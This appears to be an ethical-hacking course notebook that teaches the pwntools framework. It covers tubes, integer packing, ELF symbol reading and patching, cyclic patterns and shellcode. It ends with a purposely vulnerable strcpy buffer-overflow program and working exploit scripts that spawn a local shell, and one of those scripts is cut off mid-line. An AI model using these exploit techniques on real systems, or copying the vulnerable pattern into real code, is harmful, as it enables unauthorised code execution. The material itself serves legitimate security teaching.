# Pwntools Python Framework

- Complete Tutoraials found here: [https://github.com/Gallopsled/pwntools-tutorial](https://github.com/Gallopsled/pwntools-tutorial)
- Documentation on Pwntools found here: [https://docs.pwntools.com/en/stable/about.html](https://docs.pwntools.com/en/stable/about.html)


- this notebook provides quick tutorials and demos on most common tasks used in basic binary exploitations

## Pwntools Introduction

- a grab-bag of tools to make exploitation during CTFs as painless as possible, and to make exploits as easy to read as possible
- makes it easy to do a local exploit, remote exploit or exploit over SSH with a one-line change
- has two main main modules: `pwn` and `pwnlib`

### pwn - Toolbox optimized for CTFs

- `import pwn` or ` from pwn import *` - you'll have access to everythin you need to write an exploit
- we'll see pwntools usage and demos specific to CTFs in [CTF](./CTF.ipynb) notebook
- install pwntools with python package manager `pip`

### Caveat
- pwntools is generated for exploiting binary programing written in C and NOT CPP
- for binary written in C++, one has to work a little harder and know underlying basics of pwntools and binary generated by C++ compiler such as g++

### Installation
- install the release version on Linux using the following instructions

In [1]:
%%bash
echo kali | sudo -S apt update -y
echo kali | sudo -S apt install -y python3 python3-pip python3-dev git libssl-dev libffi-dev build-essential
echo kali | sudo -S python3 -m pip install --upgrade pip
echo kali | sudo -S python3 -m pip install --upgrade pwntools

Get:1 http://packages.microsoft.com/repos/vscode stable InRelease [3,959 B]
Get:2 http://packages.microsoft.com/repos/vscode stable/main amd64 Packages [217 kB]
Get:3 http://kali.download/kali kali-rolling InRelease [30.5 kB]
Get:4 http://kali.download/kali kali-rolling/main amd64 Packages [17.1 MB]
Get:5 http://kali.download/kali kali-rolling/contrib amd64 Packages [105 kB]
Get:6 http://kali.download/kali kali-rolling/non-free amd64 Packages [202 kB]
Fetched 17.7 MB in 3s (5,130 kB/s)
Reading package lists...
Building dependency tree...
Reading state information...
105 packages can be upgraded. Run 'apt list --upgradable' to see them.
Reading package lists...
Building dependency tree...
Reading state information...
build-essential is already the newest version (12.8).
git is already the newest version (1:2.29.2-1).
git set to manually installed.
libffi-dev is already the newest version (3.3-5).
libffi-dev set to manually installed.
python3 is already the newest version (3.9.0-4).
pyth

[sudo] password for kali: 



dpkg-preconfigure: unable to re-open stdin: No such file or directory


#### help

```bash
┌──(kali㉿K)-[~/EthicalHacking]
└─$ pwn -h                                                                                  2 ⨯
usage: pwn [-h]
           {asm,checksec,constgrep,cyclic,debug,disasm,disablenx,elfdiff,elfpatch,errno,hex,phd,pwnstrip,scramble,shellcraft,template,unhex,update,version}
           ...

Pwntools Command-line Interface

positional arguments:
  {asm,checksec,constgrep,cyclic,debug,disasm,disablenx,elfdiff,elfpatch,errno,hex,phd,pwnstrip,scramble,shellcraft,template,unhex,update,version}
    asm                 Assemble shellcode into bytes
    checksec            Check binary security settings
    constgrep           Looking up constants from header files. Example: constgrep -c freebsd
                        -m ^PROT_ '3 + 4'
    cyclic              Cyclic pattern creator/finder
    debug               Debug a binary in GDB
    disasm              Disassemble bytes into text format
    disablenx           Disable NX for an ELF binary
    elfdiff             Compare two ELF files
    elfpatch            Patch an ELF file
    errno               Prints out error messages
    hex                 Hex-encodes data provided on the command line or stdin
    phd                 Pwnlib HexDump
    pwnstrip            Strip binaries for CTF usage
    scramble            Shellcode encoder
    shellcraft          Microwave shellcode -- Easy, fast and delicious
    template            Generate an exploit template
    unhex               Decodes hex-encoded data provided on the command line or via stdin.
    update              Check for pwntools updates
    version             Pwntools version

optional arguments:
  -h, --help            show this help message and exit
```

### `from pwn import *` globals

- see all the names imported into global namespace to make your life easier: 
[https://docs.pwntools.com/en/stable/globals.html](https://docs.pwntools.com/en/stable/globals.html)

## Tubes
- need to talk to the target binary in order to `pwn` it!
- pwntools makes it a breeze...
- unlike other Python libraries, pwn doesn't seem to work directly on Jupyter Notebook that uses IPython
- let's use Python prompt on termial to demostrate some quick one liners for basic io
- see details: https://github.com/Gallopsled/pwntools-tutorial/blob/master/tubes.md
    

```bash

┌──(kali㉿K)-[~/EthicalHacking]
└─$ python                                                                                127 ⨯
Python 3.8.5 (default, Sep  4 2020, 07:30:14) 
[GCC 7.3.0] :: Anaconda, Inc. on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> from pwn import *
>>> sh = process('sh')
[x] Starting local process '/usr/bin/sh'
[+] Starting local process '/usr/bin/sh': pid 16126

```

####  Basic IO
- `recv(n)` - Recieves any number of available bytes
- `recvline()` - Receives data until a newline is encountered
- `recvuntil(delim)` - Receives data until a delimeter is encountered
- `send(data)` - Sends data
- `sendline(data)` - Sends data plus a newline char
- `clean()` - Discard all buffered data

```bash
>>> sh.sendline(b'sleep 3; echo Hello World!;')
>>> print(sh.recvline())
b'Hello World!\n'
```

#### Interactive sessions
- let's pretend you land a shell on some remote server

```bash
>>> sh.interactive()
[*] Switching to interactive mode

whoami  
kali
date
Fri 18 Dec 2020 12:28:44 PM MST

exit
[*] Got EOF while reading in interactive

[*] Process '/bin/sh' stopped with exit code 0 (pid 16145)
[*] Got EOF while sending in interactive
```

- see script examples in `pwntools-demos/basic_io` folder

## Utility Functions
- half of Pwntools is utility functions so that you no longer need to copy paste things
- see here - https://github.com/Gallopsled/pwntools-tutorial/blob/master/utility.md

### Packing and Unpacking Integers

- integers such as memory addresses need to be sent to the target program according to it's endianness (x86 is little endian)
- pwntools can detect and automatically pack and unpack integers according to the endianness of the target program

- `pack()` - create word-size (4 bytes) packed (endian-aware) integer
    - help(pack)
- `unpack()` - unpacks a word-size integer (endian-aware)
    - help(unpack)
- `p32()` - pack an integer as 32-bit binary (byte) value
    - help(p32)
- `u32()` - unpack packed binary into integer value
    - help(u32)
- also has API to pack and unpack into 8, 16, 64-bit, and archetecture specific integer representations


```bash
>>> from pwn import *

>>> pack(1)
b'\x01\x00\x00\x00'

>>> unpack(b'\x01\x00\x00\x00')
1

>>> p32(1)
b'\x01\x00\x00\x00'

>>>p32(-1)
b'\xff\xff\xff\xff'

>>>p32**32 - 1)
b'\xff\xff\xff\xff'

>>>p32(1, endian='big')
b'\x00\x00\x00\x01'

>>>p16(1)
b'\x01\x00'

>>> p64(1)
b'\x01\x00\x00\x00\x00\x00\x00\x00'

>>> p32(0xdeadbeef, endian='big')
b'\xde\xad\xbe\xef'
>>> add = p32(0xdeadbeef) # little endian

>>> add
b'\xef\xbe\xad\xde'

>>> print(u32(add))
3735928559

>>> hex(u32(add))
'0xdeadbeef'
```

## ELFs
- https://github.com/Gallopsled/pwntools-tutorial/blob/master/elf.md
- `ELF` class makes it easy to interact with ELF files

```bash
>>> from pwn import *
>>> ELF('/bin/bash')
[*] '/bin/bash'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
    FORTIFY:  Enabled
ELF('/bin/bash')

```

### Using Symbols
- ELF files have several sets of symbols available
- symbols are contained in respective dictionary `{name: data}`
    - ELF.symbols - lists all known symbols, including those below. Preference is given the PLT entries over GOT entries.
    - ELF.got - only contains GOT entries
        - Global Offsets Table - used to resolve addresses
    - ELF.plt only contains PLT entries
        - Procedure Linkage Table is used to call external procedures/functions whose address isn't known in the time of linking, and is left to be resolved by the dynamic linker at run time
    - ELF.functions - only contains functions (requires DWARF symbols)
- more on PLT and GOT read [this](https://www.technovelty.org/linux/plt-and-got-the-key-to-code-sharing-and-dynamic-libraries.html)
- Let's compile and and read ELF of `pwntools-demos/basic_exploit/vuln.cpp` program

In [7]:
! cat pwntools-demos/demo.cpp

#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <iostream>
using namespace std;

void get_shell() {
    system("sh");
}

void bad() {
    char buffer[64];
    printf("Enter some text: ");
    cin >> buffer;
    printf("You entered: %s\n", buffer);
}

int main(int argc, char** argv) {
    printf("Welcome... Enter to continue.\n");
    cin.get();
    system("clear");
    bad();
    printf("Good bye!\n");
    return 0;
}


In [8]:
%%bash
input="pwntools-demos/demo.cpp"
output="demo.exe"
echo kali | sudo -S ./compile.sh $input $output

[sudo] password for kali: 

In [9]:
# let's find the address of get_shell using nm program
! nm demo.exe | grep get_shell

08049312 t _GLOBAL__sub_I__Z9get_shellv
080491c2 T _Z9get_shellv


```bash
>>> from pwn import *
>>> e = ELF('demo.exe')
[*] '/home/kali/projects/EthicalHacking/demo.exe'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)
    RWX:      Has RWX segments
    
>>> print('{:#010x}'.format(e.symbols['main']))
0x080491e6 

>>> print('{:#010x}'.format(e.symbols['strcpy']))
0x08049030

>>> print('{:#010x}'.format(e.got['strcpy']))                                       
0x0804c00c

>>> print('{:#010x}'.format(e.plt['strcpy']))                                                0x08049030 

>>> print('{:#010x}'.format(e.functions['main'].address))
0x080491e6

# find the address of get_shell function using Pwntool's ELF class
>>> for key in e.functions:
...   if 'get_shell' in key:
...     print('{:#010x}'.format(e.functions[key].address))
...     
0x08049182

```

### Reading ELF Files
- interact with ELF as if it were loadded into memory
- use `read`, `write`, `pack`, `unpack`, `disasm`, etc. methods to interact

```bash
>>> from pwn import *
>>> e = ELF('demo.exe')
[*] '/home/kali/projects/EthicalHacking/demo.exe'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)
    RWX:      Has RWX segments

# print 4 bytes from beginning of the e's address in memory
>>> print(e.read(e.address, 4))
b'\x7fELF'

>>> get_shell = e.symbols['_Z9get_shellv']
>>> print('{:#010x}'.format(get_shell))
0x08049182

>>> e.read(get_shell, 14)
b'U\x89\xe5S\x83\xec\x04\xe8\x96\x00\x00\x00\x05r'

>>> print(e.disasm(e.symbols['_Z9get_shellv'], 14))
 8049182:       55                      push   ebp                                                               
 8049183:       89 e5                   mov    ebp, esp
 8049185:       53                      push   ebx
 8049186:       83 ec 04                sub    esp, 0x4
 8049189:       e8 96 00 00 00          call   0x8049224
 804918e:       05                      .byte 0x5
 804918f:       72                      .byte 0x72

```

### Patching ELF Files
- modify/patch ELF files
- let's modify `clear` with `sh` to get a shell

```bash
>>> e = ELF('demo.exe')                                                                     
[*] '/home/kali/projects/EthicalHacking/demo.exe'                                                                 
    Arch:     i386-32-little                                                                                      
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)
    RWX:      Has RWX segments
>>> e.search(b'clear')
<generator object ELF.search at 0x7ffff4dc8f20>

>>> hex(next(e.search(b'clear')))
'0x804a04c'

>>> e.read(0x804a04c, 5)
b'clear'

>>> e.write(next(e.search(b'clear')), b'sh\x00')

>>> e.save('demo_mod.exe')

$ chomod +x demo_mod.exe
$ ./demo_mod.exe
```

### Generating Unique Cyclic sequences
- inorder to find offset, we need to generate a cyclic pattern long enough to crash the target program by over-writing the caller's return address

- `cyclic(length, n)` - Generates a length of the sequence that should be `n` character unique
- `cyclic_find(subsequence, n)` - Finds subsequence that's `n` bytes unique; return positive index for -1 (if subsequence not found)

- create a cyclic pattern of of size 20 with 8 unique character

```bash
>>> cyclic(20, n=8)
b'aaaaaaaabaaaaaaacaaa'
```

- search 8 a's subsequence in cyclic pattern

```bash
>>> cyclic_find('aaaaaaaa', n=8)
0

```

### Core dump and offset
- see `pwntools_demos/core_files` to find offset from core dump files

### Shellcode
- pwntools provide shellcraft module to generate shellcode

- list available shellcode

```bash
$ shellcraft --help
$ shellcraft -l
$ shellcraft -l | grep i386.linux

```

- running a shellcode

```bash
┌──(kali㉿K)-[~]
└─$ shellcraft -r i386.linux.sh    
[!] Your binutils version is too old and may not work!
    Try updating with: https://docs.pwntools.com/en/stable/install/binutils.html
    Reported Version: "GNU assembler (crosstool-NG 1.23.0.444-4ea7) 2.31.1\nCopyright (C) 2018 Free Software Foundation, Inc.\nThis program is free software; you may redistribute it under the terms of\nthe GNU General Public License version 3 or later.\nThis program has absolutely no warranty.\nThis assembler was configured for a target of `x86_64-conda_cos6-linux-gnu'."
[*] '/tmp/pwn-asm-f0hjebqe/step3-elf'
    Arch:     i386-32-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8049000)
    RWX:      Has RWX segments
[+] Starting local process '/tmp/pwn-asm-f0hjebqe/step3-elf': pid 22485
[*] Switching to interactive mode
$ whoami
kali
$ 
```

## Basic exploit code development

- we'll use `pwntools-demos/basic_exploit/vuln.cpp` file to demonstrate the basic exploit generation with pwntools

In [1]:
! cat pwntools-demos/basic_exploit/vuln.cpp

#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>

void get_shell() {
    system("sh");
}

void bad(char * data) {
    char buffer[64];
    strcpy(buffer, data);
    printf("%s\n", buffer);
}

int main(int argc, char** argv) {
    bad(argv[1]);
}

- goal is to get the program execute `get_shell()` by overflowing the caller's return address in `bad()`
- let's see an example that uses gdb-peda and pwntools first, then we'll see an example using only pwntools

In [ ]:
%%bash
input="pwntools-demos/basic_exploit/vuln.cpp"
output="pwntools-demos/basic_exploit/vuln_cpp.exe"
echo kali | sudo -S ./compile.sh $input $output

In [4]:
# run the target program passing "Hello World!" argument
! pwntools-demos/basic_exploit/vuln_cpp.exe "Hello World!"

Hello World!


In [7]:
# let's see the exploit code
! cat pwntools-demos/basic_exploit/exploit_vuln.py

#! /usr/bin/env python

from pwn import *

target_name = './vuln_cpp.exe'

offset = 76 #FIXME
func_address = b"\x82\x91\x04\x08" # FIXME
payload = b'A'*76+func_address
print(f'{payload} has length {len(payload)}')

# run target program with the payload as an argument
io = process([target_name, payload])

# Get a shell!
io.sendline(b'id')
print(io.recvline())

# get interactive shell
io.interactive()


- run the exploit
- get the shell!

```bash
┌──(kali㉿K)-[~/EthicalHacking/pwntools-demos/basic_exploit]
└─$ python exploit_vuln.py 
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x82\x91\x04\x08' has length 80
[+] Starting local process './vuln_cpp.exe': pid 17369
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x82\x91\x04\x08\n'
[*] Switching to interactive mode
uid=1000(kali) gid=1000(kali) groups=1000(kali),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),109(netdev),118(bluetooth),133(scanner),141(kaboxer)
$ 
$ whoami
kali
$ date
Fri 18 Dec 2020 01:52:03 PM MST
$ exit
[*] Got EOF while reading in interactive
$ 
[*] Process './vuln_cpp.exe' stopped with exit code -11 (SIGSEGV) (pid 17369)
[*] Got EOF while sending in interactive
```

### Exploit code with only pwntools API

In [9]:
! cat pwntools-demos/basic_exploit/exploit_vuln_cpp.py

#! /usr/bin/env python

# https://docs.pwntools.com/en/stable/elf/corefile.html

from pwn import *

target_name = './vuln_cpp.exe'
# Set up pwntools for the correct architecture
exe = context.binary = ELF(target_name)

#print(exe.symbols)

# Generate a cyclic pattern so that we can auto-find the offset
payload = cyclic(128, n=8)

# Run the process once so that it crashes
p = process([target_name, payload])
p.wait() # wait for close

# Get the core dump
core = Coredump('./core')

# Our cyclic pattern should have been used as the crashing address, make sure!
#assert p32(core.eip) in payload

offset = cyclic_find(core.read(core.esp, 8), n=8) - 4
#print('offset=', offset)
# Cool! Now let's just replace that value with the address of 'win'
# search for get_shell symbol address
# in C; func_address = exe.symbols.get_shell
# in C++; parse the symbols dictionary to look for function name in key
for symbol in exe.symbols.keys():
    if symbol.find("get_shell") >=0:
        func_address = exe.sy

- for the above exploit code, everything needed to exploit the prgram is automatically determined using pwntools API except for the target program name

- run the exploit and enjoy the shell

```bash
                                                                                           
┌──(kali㉿K)-[~/EthicalHacking/pwntools-demos/basic_exploit]
└─$ python exploit_vuln_cpp.py

[*] '/home/kali/EthicalHacking/pwntools-demos/basic_exploit/vuln_cpp.exe'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)
    RWX:      Has RWX segments
[+] Starting local process './vuln_cpp.exe': pid 17482
[*] Process './vuln_cpp.exe' stopped with exit code -11 (SIGSEGV) (pid 17482)
[+] Parsing corefile...: Done
[*] '/home/kali/EthicalHacking/pwntools-demos/basic_exploit/core'
    Arch:      i386-32-little
    EIP:       0x61616161
    ESP:       0xffffc340
    Exe:       '/home/kali/EthicalHacking/pwntools-demos/basic_exploit/vuln_cpp.exe' (0x8049000)
    Fault:     0x61616161
[+] Starting local process './vuln_cpp.exe': pid 17485
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x82\x91\x04\x08\n'
[*] Switching to interactive mode
uid=1000(kali) gid=1000(kali) groups=1000(kali),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),109(netdev),118(bluetooth),133(scanner),141(kaboxer)
$ 
$ whoami
kali
$ date
Fri 18 Dec 2020 01:59:45 PM MST
$ exit
```